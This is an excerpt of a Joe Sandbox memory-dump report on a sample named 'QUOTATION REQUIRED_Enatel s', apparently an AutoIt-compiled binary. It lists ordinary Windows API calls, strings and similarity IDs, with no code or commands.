                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: STOP
                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F71D4C
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F71C46
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F71CC8
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F71DD3
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                                    • API String ID: 176396367-3042988571
                                                                                                                    APIs
                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F70B23
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Message
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F30D71,?,?,?,00F1100A), ref: 00F2F7CE
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00F1100A), ref: 00F30D75
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F1100A), ref: 00F30D84
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F30D7F
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F8302F
                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F83044
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA236C
• PostMessageW.USER32(00000000), ref: 00FA2373
  • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FA233F
  • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F4BE93
• GetLastError.KERNEL32 ref: 00F4BEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4BEFC
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0